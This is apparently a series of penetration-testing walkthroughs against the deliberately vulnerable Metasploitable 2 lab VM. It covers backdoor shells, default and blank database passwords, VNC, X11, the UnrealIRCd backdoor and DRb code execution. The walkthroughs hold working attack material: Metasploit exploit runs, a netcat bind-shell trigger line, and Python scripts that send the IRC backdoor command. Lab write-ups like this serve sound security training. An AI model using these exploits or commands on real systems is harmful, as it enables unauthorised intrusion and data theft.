Channel: Pax Pentest » Nmap

Metasploitable 2: Port 1524 ingreslock Backdoor


The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
1524/tcp  open  ingreslock?

Port 1524 is registered to ingreslock (the Ingres lock manager), which is why Nmap labels it that way with a question mark, but in practice it is a classic place to leave a backdoor root shell on a compromised server.

The Nessus report had this to say on port 1524:

1524/tcp

Rogue Shell Backdoor Detection

Synopsis

The remote host may have been compromised.

Description

A shell is listening on the remote port, without any authentication. An attacker may use it by connecting to the remote port and sending commands directly.

And so we can test the backdoor connection in the attacking Terminal:

:~# telnet 192.168.1.103 1524
Trying 192.168.1.103...
Connected to 192.168.1.103.
Escape character is '^]'.
root@metasploitable:/#

Very simple.
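What Nessus's Rogue Shell Backdoor Detection and Metasploit's command-shell handler actually do to confirm a shell is send a command carrying a random token and look for the token coming back on a line of its own. As an added example that is not part of the original post, here is that check in Python; it assumes a plain TCP listener like the one on 1524/tcp and uses only the standard library. The host and port are arguments, nothing about the target is hard-coded.

```python
import binascii
import os
import socket


def make_probe() -> tuple[bytes, str]:
    """Build a harmless probe command carrying a random token.

    A real shell executes `echo <token>` and prints the token on a line of its
    own; a service that merely echoes input (or ignores it) never does.
    """
    token = binascii.hexlify(os.urandom(8)).decode()
    return f"echo {token}\n".encode(), token


def reply_proves_shell(token: str, reply: bytes) -> bool:
    """True only if the token came back alone on a line, i.e. the command ran.

    "echo <token>" coming back (an echo service, or a pty echoing our keystrokes
    without running anything) does not count, and neither does an empty reply.
    """
    text = reply.decode("latin-1", "replace")
    return any(line.strip() == token for line in text.splitlines())


def probe_rogue_shell(host: str, port: int, timeout: float = 5.0) -> tuple[bool, bytes]:
    """Connect, send the probe and report whether an unauthenticated shell answered.

    Live check only (not exercised offline): it needs a reachable target such as
    Metasploitable 2 on 1524/tcp.
    """
    probe, token = make_probe()
    reply = b""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        s.sendall(probe)
        while True:
            try:
                chunk = s.recv(4096)
            except socket.timeout:
                break
            if not chunk:
                break
            reply += chunk
            # Token seen and a prompt on the end: no need to wait for the timeout.
            if token.encode() in reply and reply.rstrip().endswith((b"#", b"$")):
                break
    return reply_proves_shell(token, reply), reply


if __name__ == "__main__":
    import sys

    target_host, target_port = sys.argv[1], int(sys.argv[2])   # e.g. 192.168.1.103 1524
    shell, raw = probe_rogue_shell(target_host, target_port)
    print("unauthenticated shell:", "YES" if shell else "no")
    print(raw.decode("latin-1", "replace"))
```

The token match is the whole point: a banner or an echo server will happily send bytes back, and only a process that executed the command can produce the token by itself.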


Metasploitable 2: Port 3306 MySQL


The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5

The Nessus report on this port was very revealing; here is some of the information:

3306/tcp

MySQL Unpassworded Account Check

Synopsis

The remote database server can be accessed without a password.

Description

It is possible to connect to the remote MySQL database server using an unpassworded account. This may allow an attacker to launch further attacks against the database.

The ‘root’ account does not have a password.

Here is the list of databases on the remote server :

- information_schema
- dvwa
- metasploit
- mysql
- owasp10
- tikiwiki
- tikiwiki195

Version : 5.0.51a-3ubuntu5
Protocol : 10
Server Status : SERVER_STATUS_AUTOCOMMIT
Server Capabilities :
CLIENT_LONG_FLAG (Get all column flags)
CLIENT_CONNECT_WITH_DB (One can specify db on connect)
CLIENT_COMPRESS (Can use compression protocol)
CLIENT_PROTOCOL_41 (New 4.1 protocol)
CLIENT_SSL (Switch to SSL after handshake)
CLIENT_TRANSACTIONS (Client knows about transactions)
CLIENT_SECURE_CONNECTION (New 4.1 authentication)

The ‘root’ account does not have a password! So, let’s see if we can connect to the SQL database with the username root and a blank password.

~# mysql -h 192.168.1.103 -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 7
Server version: 5.0.51a-3ubuntu5 (Ubuntu)

Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

And there we have the database connection. Let’s have a look at the databases:

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| dvwa               |
| metasploit         |
| mysql              |
| owasp10            |
| tikiwiki           |
| tikiwiki195        |
+--------------------+
7 rows in set (0.01 sec)

Let’s choose mysql database and have a look at the tables:

mysql> use mysql
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+---------------------------+
| Tables_in_mysql           |
+---------------------------+
| columns_priv              |
| db                        |
| func                      |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| host                      |
| proc                      |
| procs_priv                |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
| user                      |
+---------------------------+
17 rows in set (0.00 sec)

Let’s have a look at users and their passwords:

mysql> select User, Password from user;
+------------------+----------+
| User             | Password |
+------------------+----------+
| debian-sys-maint |          |
| root             |          |
| guest            |          |
+------------------+----------+
3 rows in set (0.00 sec)

mysql>

Three accounts with an empty Password column, which in MySQL means no password is set at all (a set password is stored there as a hash, never as a blank), so any of them can be used. Whether an account is reachable from our host is decided by its Host column, and root clearly is.
Let’s have a look at tables within another database:

mysql> show tables from owasp10;
+-------------------+
| Tables_in_owasp10 |
+-------------------+
| accounts          |
| blogs_table       |
| captured_data     |
| credit_cards      |
| hitlog            |
| pen_test_tools    |
+-------------------+
6 rows in set (0.01 sec)

We’ll change database and have a look at credit card details:

mysql> use owasp10
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> select * from credit_cards;
+------+------------------+-----+------------+
| ccid | ccnumber         | ccv | expiration |
+------+------------------+-----+------------+
|    1 | 4444111122223333 | 745 | 2012-03-01 |
|    2 | 7746536337776330 | 722 | 2015-04-01 |
|    3 | 8242325748474749 | 461 | 2016-03-01 |
|    4 | 7725653200487633 | 230 | 2017-06-01 |
|    5 | 1234567812345678 | 627 | 2018-11-01 |
+------+------------------+-----+------------+
5 rows in set (0.03 sec)
mysql>

Hat-tip to PentestLab for the MySQL post-exploitation.
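The capability list and protocol number Nessus printed come straight from the greeting the server sends every client before authentication, and the empty Password column is what makes the blank password work in the 4.1 authentication scheme (mysql_native_password). The Python below is an added example, not code from the post: it decodes such a greeting and walks through both sides of that scheme. The greeting packet it parses is constructed here to match the values above (version 5.0.51a-3ubuntu5, connection id 7, the seven listed capabilities, SERVER_STATUS_AUTOCOMMIT); its scramble bytes are fixed for reproducibility and were not captured from Metasploitable.

```python
import hashlib
import struct

# Capability bits of the MySQL client/server protocol. The lower 16 bits are the
# ones Nessus lists; the upper 16 carry later flags such as CLIENT_PLUGIN_AUTH.
CAPABILITY_NAMES = {
    0x0001: "CLIENT_LONG_PASSWORD",  0x0002: "CLIENT_FOUND_ROWS",
    0x0004: "CLIENT_LONG_FLAG",      0x0008: "CLIENT_CONNECT_WITH_DB",
    0x0010: "CLIENT_NO_SCHEMA",      0x0020: "CLIENT_COMPRESS",
    0x0040: "CLIENT_ODBC",           0x0080: "CLIENT_LOCAL_FILES",
    0x0100: "CLIENT_IGNORE_SPACE",   0x0200: "CLIENT_PROTOCOL_41",
    0x0400: "CLIENT_INTERACTIVE",    0x0800: "CLIENT_SSL",
    0x1000: "CLIENT_IGNORE_SIGPIPE", 0x2000: "CLIENT_TRANSACTIONS",
    0x4000: "CLIENT_RESERVED",       0x8000: "CLIENT_SECURE_CONNECTION",
    0x00080000: "CLIENT_PLUGIN_AUTH",
}
SERVER_STATUS_AUTOCOMMIT = 0x0002


def parse_handshake_v10(packet: bytes) -> dict:
    """Decode the server greeting (protocol version 10) a client receives on connect."""
    length = int.from_bytes(packet[0:3], "little")      # 3-byte payload length
    body = packet[4:4 + length]                          # byte 3 is the sequence id
    if body[0] != 10:
        raise ValueError("not a protocol-10 handshake")
    nul = body.index(b"\x00", 1)
    version = body[1:nul].decode("ascii")
    i = nul + 1
    conn_id = struct.unpack_from("<I", body, i)[0]
    i += 4
    salt = body[i:i + 8]                                 # first 8 scramble bytes
    i += 8 + 1                                           # plus a filler byte
    cap_lo, charset, status, cap_hi = struct.unpack_from("<HBHH", body, i)
    i += 7 + 1 + 10                                      # auth-plugin-data length + reserved
    caps = cap_lo | (cap_hi << 16)
    if caps & 0x8000:                                    # CLIENT_SECURE_CONNECTION: 12 more
        salt += body[i:i + 12]
    return {
        "version": version,
        "connection_id": conn_id,
        "protocol": 10,
        "capabilities": [n for bit, n in sorted(CAPABILITY_NAMES.items()) if caps & bit],
        "autocommit": bool(status & SERVER_STATUS_AUTOCOMMIT),
        "salt": salt,
    }


def native_password_response(password: str, salt: bytes) -> bytes:
    """Client side of mysql_native_password, the "new 4.1 authentication".

    SHA1(pw) XOR SHA1(salt + SHA1(SHA1(pw))). An empty password sends an empty
    response, which is exactly why `mysql -u root` with a blank password walks in.
    """
    if not password:
        return b""
    s1 = hashlib.sha1(password.encode()).digest()
    s2 = hashlib.sha1(s1).digest()
    s3 = hashlib.sha1(salt + s2).digest()
    return bytes(a ^ b for a, b in zip(s1, s3))


def stored_password_hash(password: str) -> str:
    """What mysql.user.Password holds: '*' + hex(SHA1(SHA1(pw))), or '' for no password."""
    if not password:
        return ""
    return "*" + hashlib.sha1(hashlib.sha1(password.encode()).digest()).hexdigest().upper()


def server_accepts(stored: str, salt: bytes, response: bytes) -> bool:
    """Server side: recover SHA1(pw) from the response and compare its SHA1 to the store."""
    if stored == "":
        return response == b""                           # no password set: blank is correct
    if len(response) != 20:
        return False
    s2 = bytes.fromhex(stored[1:])
    s3 = hashlib.sha1(salt + s2).digest()
    s1 = bytes(a ^ b for a, b in zip(response, s3))
    return hashlib.sha1(s1).digest() == s2


def build_sample_handshake() -> bytes:
    """Constructed greeting matching the Nessus output above (not a real capture)."""
    caps = 0x0004 | 0x0008 | 0x0020 | 0x0200 | 0x0800 | 0x2000 | 0x8000
    salt = bytes(range(1, 21))                           # 20 fixed scramble bytes
    body = (b"\x0a" + b"5.0.51a-3ubuntu5\x00" + struct.pack("<I", 7)
            + salt[:8] + b"\x00"
            + struct.pack("<HBHH", caps & 0xFFFF, 8, SERVER_STATUS_AUTOCOMMIT, caps >> 16)
            + b"\x00" + b"\x00" * 10 + salt[8:] + b"\x00")
    return len(body).to_bytes(3, "little") + b"\x00" + body


if __name__ == "__main__":
    hs = parse_handshake_v10(build_sample_handshake())
    for k, v in hs.items():
        print(f"{k}: {v}")
    print("PASSWORD('password') =", stored_password_hash("password"))
```

Two things worth noticing when you run it: the empty-password case never touches the scramble at all, and the stored hash is unsalted, so a dumped Password column can be cracked offline with nothing more than double SHA-1.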

(The original post embeds a SecurityTube video at this point showing a root shell obtained via Metasploit.)

Metasploitable 2: Port 5432 – PostgreSQL


The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 – 8.3.7

Metasploit's postgres_login scanner turns this into a straightforward credential guess; its default user/password list includes the vendor default postgres:postgres:

msf > use auxiliary/scanner/postgres/postgres_login
msf auxiliary(postgres_login) > set RHOSTS 192.168.1.103
RHOSTS => 192.168.1.103
msf auxiliary(postgres_login) > run

[*] 192.168.1.103:5432 Postgres - [01/21] - Trying username:'postgres' with password:'' on database 'template1'
[-] 192.168.1.103:5432 Postgres - Invalid username or password: 'postgres':''
[-] 192.168.1.103:5432 Postgres - [01/21] - Username/Password failed.
[*] 192.168.1.103:5432 Postgres - [02/21] - Trying username:'' with password:'' on database 'template1'
[-] 192.168.1.103:5432 Postgres - Invalid username or password: '':''
[-] 192.168.1.103:5432 Postgres - [02/21] - Username/Password failed.
[*] 192.168.1.103:5432 Postgres - [03/21] - Trying username:'scott' with password:'' on database 'template1'
[-] 192.168.1.103:5432 Postgres - Invalid username or password: 'scott':''
[-] 192.168.1.103:5432 Postgres - [03/21] - Username/Password failed.
[*] 192.168.1.103:5432 Postgres - [04/21] - Trying username:'admin' with password:'' on database 'template1'
[-] 192.168.1.103:5432 Postgres - Invalid username or password: 'admin':''
[-] 192.168.1.103:5432 Postgres - [04/21] - Username/Password failed.
[*] 192.168.1.103:5432 Postgres - [05/21] - Trying username:'postgres' with password:'postgres' on database 'template1'
[+] 192.168.1.103:5432 Postgres - Logged in to 'template1' with 'postgres':'postgres'
[+] 192.168.1.103:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.)

And there we have it; username and password are both postgres.

So let’s connect via the postgres client in the Terminal:

# psql -h 192.168.1.103 -U postgres -W
Password for user postgres: 
psql (9.1.9, server 8.3.1)
WARNING: psql version 9.1, server version 8.3.
         Some psql features might not work.
SSL connection (cipher: DHE-RSA-AES256-SHA, bits: 256)
Type "help" for help.

postgres=# \l
                    List of databases
   Name    |  Owner   | Encoding |   Access privileges   
-----------+----------+----------+-----------------------
 postgres  | postgres | UTF8     | 
 template0 | postgres | UTF8     | =c/postgres          +
           |          |          | postgres=CTc/postgres
 template1 | postgres | UTF8     | =c/postgres          +
           |          |          | postgres=CTc/postgres
(3 rows)

postgres=#

(The original post embeds a video at this point demonstrating the above with further post-exploitation steps.)

Now we have the password we can also use Metasploit to obtain a Meterpreter shell:

msf > use exploit/linux/postgres/postgres_payload
msf exploit(postgres_payload) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf exploit(postgres_payload) > show options

Module options (exploit/linux/postgres/postgres_payload):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DATABASE  template1        yes       The database to authenticate against
   PASSWORD                   no        The password for the specified username. Leave blank for a random password.
   RHOST     192.168.1.103    yes       The target address
   RPORT     5432             yes       The target port
   USERNAME  postgres         yes       The username to authenticate as
   VERBOSE   false            no        Enable verbose output

Exploit target:

   Id  Name
   --  ----
   0   Linux x86

msf exploit(postgres_payload) > set PASSWORD postgres
PASSWORD => postgres
msf exploit(postgres_payload) > set PAYLOAD linux/x86/meterpreter/bind_tcp
PAYLOAD => linux/x86/meterpreter/bind_tcp
msf exploit(postgres_payload) > exploit

[*] Started bind handler
[*] 192.168.1.103:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Uploaded as /tmp/fTDEMbhY.so, should be cleaned up automatically
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.1.103
[*] Meterpreter session 1 opened (192.168.1.78:49575 -> 192.168.1.103:4444) at 2013-11-20 08:04:41 +0000

meterpreter >

Metasploitable 2: Port 5900 – VNC


The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
5900/tcp  open  vnc         VNC (protocol 3.3)

The write-ups online for this VNC service all rely on brute force; the Nessus output for the port, however, already hands us the password:

Port 5900/tcp
VNC Server ‘password’ Password

Synopsis
A VNC server running on the remote host is secured with a weak password.

Description
The VNC server running on the remote host is secured with a weak password. Nessus was able to login using VNC authentication and a password of ‘password’. A remote, unauthenticated attacker could exploit this to take control of the system.

Solution
Secure the VNC service with a strong password.

Risk Factor
Critical

CVSS Base Score
10.0 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)

Plugin Information:
Publication date: 2012/08/29, Modification date: 2012/08/29

Ports
tcp/5900

Nessus logged in using a password of “password”.

Nessus has done the hard work: the VNC password is simply password. Note that classic VNC authentication (the RFB 3.3 challenge-response used here) takes only the first eight characters of the password as a DES key, so even the "strong password" the Nessus solution asks for is worth at most eight characters.

All that’s left for us to do is to log in to the VNC service via the attacking Terminal:

# vncviewer 192.168.1.103
Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password:
Authentication successful
Desktop name "root's X desktop (metasploitable:0)"
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0

And up pops the virtual desktop:

metasploitable_vnc

Metasploitable 2: Port 6000 – X11 Server


It’s worth noting at the outset of this post that I was unsuccessful in exploiting this X11 service, but will document my efforts nonetheless.

The Nmap scan of Metasploitable 2 revealed:

PORT     STATE SERVICE VERSION
6000/tcp open  X11     (access denied)

The Nessus scan on this port detailed the following:

Port 6000/tcp
10407 – X Server Detection     [-/+]

Synopsis
An X11 server is listening on the remote host

Description

The remote host is running an X11 server. X11 is a client-server protocol that can be used to display graphical applications running on a given host on a remote client.

Since the X11 traffic is not ciphered, it is possible for an attacker to eavesdrop on the connection.

Solution
Restrict access to this port. If the X11 client/server facility is not used, disable TCP support in X11 entirely (-nolisten tcp).

So Nessus only warns that the unencrypted X11 traffic could be sniffed on the wire; it says nothing about whether the server accepts unauthenticated clients. Metasploit's open_x11 scanner checks exactly that:

msf exploit(postgres_payload) > use auxiliary/scanner/x11/open_x11
msf auxiliary(open_x11) > show options

Module options (auxiliary/scanner/x11/open_x11):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    6000             yes       The target port
   THREADS  1                yes       The number of concurrent threads

msf auxiliary(open_x11) > set RHOSTS 192.168.1.103
RHOSTS => 192.168.1.103
msf auxiliary(open_x11) > exploit

[*] 192.168.1.103 Access Denied
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(open_x11) >

Metasploit is reporting “access denied”.

Every write-up I have read on exploiting this service relies on an open X server, one that accepts connections without any authorisation check; that does not appear to be the case here.

Metasploit: The Penetration Tester's Guide advises using the xspy sniffing tool to capture keystrokes, since the X server handles the whole GUI including the mouse and keyboard; however, that too relies on the server accepting unauthenticated clients, and so, as expected, it failed:

# xspy 192.168.1.103
Client is not authorized to connect to Serverxspy: can't open display 192.168.1.103:0
blah....

# xspy -display 192.168.1.103 -delay 100 -up
xspy: can't open display -display:0
blah....

As I'm not sure how to progress this one, I admit defeat at this point.
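Both xspy and Metasploit's open_x11 learn whether an X server is "open" the same way: they send the X11 connection-setup request with no authorization protocol at all and read the one-byte status in the reply (0 Failed, 1 Success, 2 Authenticate). Below is that exchange as an added Python example, not code from the post or from either tool. The two reply packets it parses offline are constructed here, the Failed one carrying the same reason string xspy printed above; probe_x11 is the live version for a host you are allowed to test.

```python
import socket
import struct


def _pad4(b: bytes) -> bytes:
    """X11 pads every variable-length field to a multiple of four bytes."""
    return b + b"\x00" * ((4 - len(b) % 4) % 4)


def build_setup_request(auth_name: bytes = b"", auth_data: bytes = b"") -> bytes:
    """X11 connection-setup request: byte order 'l' (little-endian), protocol 11.0.

    With an empty authorization name and data this is precisely the unauthenticated
    attempt xspy and open_x11 make; pass b"MIT-MAGIC-COOKIE-1" and the cookie to
    authenticate instead.
    """
    header = struct.pack("<cxHHHHxx", b"l", 11, 0, len(auth_name), len(auth_data))
    return header + _pad4(auth_name) + _pad4(auth_data)


def parse_setup_reply(reply: bytes) -> tuple[str, str]:
    """Classify the server's answer by its first byte: 0 Failed, 1 Success, 2 Authenticate."""
    status = reply[0]
    if status == 0:
        reason_len = reply[1]                      # byte 1: length of the reason text
        return "failed", reply[8:8 + reason_len].decode("latin-1")
    if status == 1:
        major, minor = struct.unpack_from("<HH", reply, 2)
        return "open", f"X{major}.{minor} server accepted an unauthenticated client"
    if status == 2:
        extra_words = struct.unpack_from("<H", reply, 6)[0]
        return "authenticate", reply[8:8 + 4 * extra_words].decode("latin-1").rstrip("\x00")
    return "unknown", reply[:16].hex()


def probe_x11(host: str, display: int = 0, timeout: float = 5.0) -> tuple[str, str]:
    """Live check (not run offline): display N listens on TCP port 6000 + N."""
    with socket.create_connection((host, 6000 + display), timeout=timeout) as s:
        s.sendall(build_setup_request())
        reply = s.recv(4096)
    return parse_setup_reply(reply)


# Constructed replies for offline use. The Failed reason is the text the X server
# sends and that xspy printed above; the Success reply is the minimal header.
def sample_denied_reply() -> bytes:
    reason = b"Client is not authorized to connect to Server"
    padded = _pad4(reason)
    return struct.pack("<BBHHH", 0, len(reason), 11, 0, len(padded) // 4) + padded


def sample_open_reply() -> bytes:
    return struct.pack("<BxHHH", 1, 11, 0, 0)


if __name__ == "__main__":
    import sys

    if len(sys.argv) > 1:
        print(probe_x11(sys.argv[1]))             # e.g. 192.168.1.103
    else:
        print(parse_setup_reply(sample_denied_reply()))
        print(parse_setup_reply(sample_open_reply()))
```

A status of 1 on an empty authorization field is what "open X server" means, and it is the only case in which xspy's keystroke sniffing can work; Metasploitable's server returns 0 with the reason shown, so the X11 route really is closed without a cookie.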

Metasploitable 2: UnrealIRCd IRC daemon


The Nmap scan of Metasploitable 2 revealed:

PORT     STATE SERVICE VERSION
6667/tcp open  irc     Unreal ircd
6697/tcp open  irc     Unreal ircd

UnrealIRCd is an Internet Relay Chat (IRC) server daemon.

This exploit has been made nice and easy for us:

On port 6667, Metasploitable2 runs the UnrealIRCd IRC daemon. This version contains a backdoor that went unnoticed for months – triggered by sending the letters “AB” followed by a system command to the server on any listening port. Metasploit has a module to exploit this in order to gain an interactive shell, as shown below.

Source

The Nessus scan reported:

Port 6667/tcp

46882 – UnrealIRCd Backdoor Detection [-/+]

Synopsis
The remote IRC server contains a backdoor.

Description
The remote IRC server is a version of UnrealIRCd with a backdoor that allows an attacker to execute arbitrary code on the affected host.

See Also
http://seclists.org/fulldisclosure/2010/Jun/277
http://seclists.org/fulldisclosure/2010/Jun/284
http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt

Solution
Re-download the software, verify it using the published MD5 / SHA1 checksums, and re-install it.

Risk Factor
Critical

CVSS Base Score
10.0 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
CVSS Temporal Score
8.3 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)

References
BID 40820
CVE CVE-2010-2075
XREF OSVDB:65445

Exploitable with
CANVAS (true)Metasploit (true)

Plugin Information:
Publication date: 2010/06/14, Modification date: 2013/02/06
Ports
tcp/6667

The remote IRC server is running as :

uid=0(root) gid=0(root)

As this Nessus scan advises us that this is exploitable via Metasploit, let’s give it a go:

msf > search ircd
[!] Database not connected or cache not built, using slow search

Matching Modules
================

   Name                                        Disclosure Date  Rank       Description
   ----                                        ---------------  ----       -----------
   exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12       excellent  UnrealIRCD 3.2.8.1 Backdoor Command Execution

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  6667             yes       The target port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf exploit(unreal_ircd_3281_backdoor) > exploit

[*] Started reverse double handler
[*] Connected to 192.168.1.103:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
[*] Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo kt8lsphf0nxKGdOA;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "kt8lsphf0nxKGdOA\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.78:4444 -> 192.168.1.103:39851) at 2013-11-20 12:33:44 +0000

whoami
root

Success.

As the backdoor is triggered by a line that starts with the letters “AB” on any port the daemon listens on, we can get root by hand with Ncat as well. The trojaned code hands the whole line to system(), “AB” included, so the real command is separated from it with a “;” (the shell fails to find a command called AB and carries on to the next statement). Here we use port 6697 and have the backdoor spawn a bind shell on port 12345:

# echo "AB;nc -l -e /bin/sh -p 12345" | ncat 192.168.1.103 6697
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Found your hostname (cached)

Then, from another terminal, we connect with Ncat to the listener the backdoor just spawned:

# ncat 192.168.1.103 12345
whoami
root

Job done.
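The trigger is simpler than the Metasploit output suggests: the trojaned read routine compares the first two bytes of whatever it read with AB and hands the entire line to system(). The Python below, added here and not part of the post, builds that line the way the ncat command above does and, for the defensive side, runs the same first-two-bytes check over a client session constructed for this example (the sample lines are made up, apart from the trigger line taken from the page) so you can see what does and does not count as a trigger.

```python
import socket

TRIGGER = b"AB"


def backdoor_line(command: str) -> bytes:
    """The line the trojaned 3.2.8.1 build reacts to.

    The daemon compares the first two bytes it read with "AB" and passes the
    whole buffer, "AB" included, to system(). The ';' makes the shell treat the
    non-existent command "AB" as a separate, failing statement so that what
    follows it still runs.
    """
    return TRIGGER + b";" + command.encode() + b"\n"


def send_trigger(host: str, port: int, command: str, timeout: float = 5.0) -> None:
    """Live equivalent of the echo | ncat one-liner above (not run offline)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(backdoor_line(command))


def classify_client_line(line: bytes) -> tuple[bool, str]:
    """Detection side: only the first two bytes matter to the backdoor.

    A line that *starts* with AB is the trigger, whatever follows (even "ABC"
    would reach system()); "AB" later in a PRIVMSG is ordinary chat. Returns
    (is_trigger, what system() would see after the AB prefix).
    """
    if line[:2] != TRIGGER:
        return False, ""
    return True, line[2:].rstrip(b"\r\n").decode("latin-1")


def scan_session(lines) -> list[str]:
    """Run the check over client->server lines and return the command tails found."""
    return [tail for hit, tail in map(classify_client_line, lines) if hit]


# Constructed client session: a legitimate IRC registration, a chat message that
# happens to contain "AB;", and the trigger line this page sends with ncat.
SAMPLE_SESSION = [
    b"NICK pax\r\n",
    b"USER pax 0 * :Pax Pentest\r\n",
    b"PRIVMSG #test :AB;this is only chat\r\n",
    b"AB;nc -l -e /bin/sh -p 12345\n",
]


if __name__ == "__main__":
    for hit in scan_session(SAMPLE_SESSION):
        print("backdoor trigger, system() gets: AB" + hit)
```

For a network signature this means matching AB at offset 0 of the client payload is both necessary and sufficient; matching the string anywhere in the stream would fire on chat.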

Metasploitable 2: Port 8787 Open and Unknown


The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
8787/tcp  open  unknown

Nmap did not recognise the service on port 8787, so I ran a more aggressive version-detection scan against it (--version-all sends every probe rather than only the ones rated likely):

~# nmap -p 8787 -sV --version-all 192.168.1.103

Starting Nmap 6.25 ( http://nmap.org ) at 2013-11-20 14:03 GMT
Nmap scan report for Unknown-00:0c:29:72:05:d6.home (192.168.1.103)
Host is up (0.081s latency).
PORT     STATE SERVICE VERSION
8787/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port8787-TCP:V=6.25%I=9%D=11/20%Time=528CC14C%P=x86_64-unknown-linux-gn
SF:u%r(GenericLines,3AB,"\0\0\0\x03\x04\x08F\0\0\x03\xa0\x04\x08o:\x16DRb:
SF::DRbConnError\x07:\x07bt\[\x17\"//usr/lib/ruby/1\.8/drb/drb\.rb:573:in\
SF:x20`load'\"7/usr/lib/ruby/1\.8/drb/drb\.rb:612:in\x20`recv_request'\"7/
SF:usr/lib/ruby/1\.8/drb/drb\.rb:911:in\x20`recv_request'\"

Nmap still cannot name the service, but the fingerprint it asks us to submit is telling: the response holds a Ruby Marshal-serialised DRb::DRbConnError with a backtrace through /usr/lib/ruby/1.8/drb/drb.rb, so this is a Distributed Ruby (dRuby, DRb) listener. That gives us a search term for Metasploit:

msf > search drb
[!] Database not connected or cache not built, using slow search

Matching Modules
================

   Name                                                   Disclosure Date  Rank       Description
   ----                                                   ---------------  ----       -----------
   exploit/linux/misc/drb_remote_codeexec                 2011-03-23       excellent  Distributed Ruby Send instance_eval/syscall Code Execution
   exploit/multi/misc/wireshark_lwres_getaddrbyname       2010-01-27       great      Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow
   exploit/multi/misc/wireshark_lwres_getaddrbyname_loop  2010-01-27       great      Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)

The drb_remote_codeexec is the most promising and so we’ll run with that:

msf > use exploit/linux/misc/drb_remote_codeexec
msf exploit(drb_remote_codeexec) > show options

Module options (exploit/linux/misc/drb_remote_codeexec):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
   URI                    yes       The dRuby URI of the target host (druby://host:port)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(drb_remote_codeexec) > set URI "druby://192.168.1.103:8787"
URI => druby://192.168.1.103:8787
msf exploit(drb_remote_codeexec) > exploit

[*] Started reverse double handler
[*] trying to exploit instance_eval
[*] instance eval failed, trying to exploit syscall
[*] payload executed from file .EbA8isJbAjsgcmD8
[*] make sure to remove that file
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo en2vfxLYQpig5Eku;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "en2vfxLYQpig5Eku\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.70:4444 -> 192.168.1.103:47082) at 2013-11-20 16:26:55 +0000

whoami
root

And we have root.
